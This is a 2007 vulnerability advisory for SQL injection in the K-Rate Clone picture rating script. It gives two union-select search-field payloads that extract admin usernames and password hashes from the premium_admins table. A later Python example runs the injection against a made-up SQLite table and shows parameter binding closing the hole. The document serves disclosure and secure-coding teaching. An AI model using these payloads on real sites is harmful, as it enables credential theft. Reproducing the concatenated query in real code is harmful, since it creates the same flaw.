evening ppl.

[~]----------------------------------------------------------------
[~] K-Rate Clone Multiple SQL Injection
[~]
[~] (advanced picture rating script)
[~]
[~] Vendor http://turn-k.net/k-rate
[~] ----------------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date: 12.09.2007
[~]
[~]
[~] Contact:stylers1@hotmail.uk
[~]
[~] -----------------------------------------------------------------
[~] Greetz tO:- All Members of PLDsecurity
[~]
[~] http://www.pldsecurity.de/forum
[~]
[~] Thanks :- | M4k3 | Pentest | Str0ke |
[~]-------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://www.site.com/advanced.html Advanced Search
[~]
[~] The following proof-of-concept search-field data is available :-
[~]
[~] -1'union select 1,2,3,4,5,6,7,8,9,10,11,12,adm_user,adm_pass,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
[~] from premium_admins/*
[~]
[~] Search Results: admin passwd hash
[~]--------------------------------------------------------------------
[~] http://www.site.com/emailpass.html
[~]
[~] The following proof-of-concept search-field data is available :-
[~]
[~] -1'union select 1,2,3,concat(adm_user,':',adm_pass),5,6,7,8,9,10,11,12,13,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from premium_admins/*
[~]--------------------------------------------------------------------

thanks and sorry for the trouble

/d3v1l
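
Added example, not part of the original advisory and not K-Rate's own code: it shows why a search term concatenated into the SQL text returns rows from premium_admins, and how binding the term as a parameter closes that path. SQLite stands in for the script's database; the pictures table, its three columns, the function names and all rows are assumptions, and only premium_admins, adm_user and adm_pass come from the advisory.

```python
import sqlite3

# Constructed stand-in schema: only premium_admins, adm_user and adm_pass
# come from the advisory; the pictures table and all rows are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pictures (id INTEGER, title TEXT, owner TEXT);
        CREATE TABLE premium_admins (adm_user TEXT, adm_pass TEXT);
        INSERT INTO pictures VALUES (1, 'sunset', 'alice');
        INSERT INTO premium_admins VALUES ('admin', 'constructed-hash-value');
    """)
    return db

def search_concatenated(db, term):
    # Flawed pattern: the search term becomes part of the SQL text, so a
    # quote in the term ends the string literal and the rest runs as SQL.
    sql = "SELECT id, title, owner FROM pictures WHERE title = '" + term + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # Hardened pattern: the term is bound as a value and never parsed as SQL.
    sql = "SELECT id, title, owner FROM pictures WHERE title = ?"
    return db.execute(sql, (term,)).fetchall()

# The advisory's search-field input, cut down to the three columns of the
# constructed pictures query.
ADVISORY_STYLE_INPUT = "-1'union select 1,adm_user,adm_pass from premium_admins/*"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", search_concatenated(db, ADVISORY_STYLE_INPUT))
    print("parameterized:", search_parameterized(db, ADVISORY_STYLE_INPUT))
    print("normal search:", search_parameterized(db, "sunset"))
```

With the bound parameter the whole input is compared to the title column as a literal string, so it matches nothing, while ordinary searches behave as before.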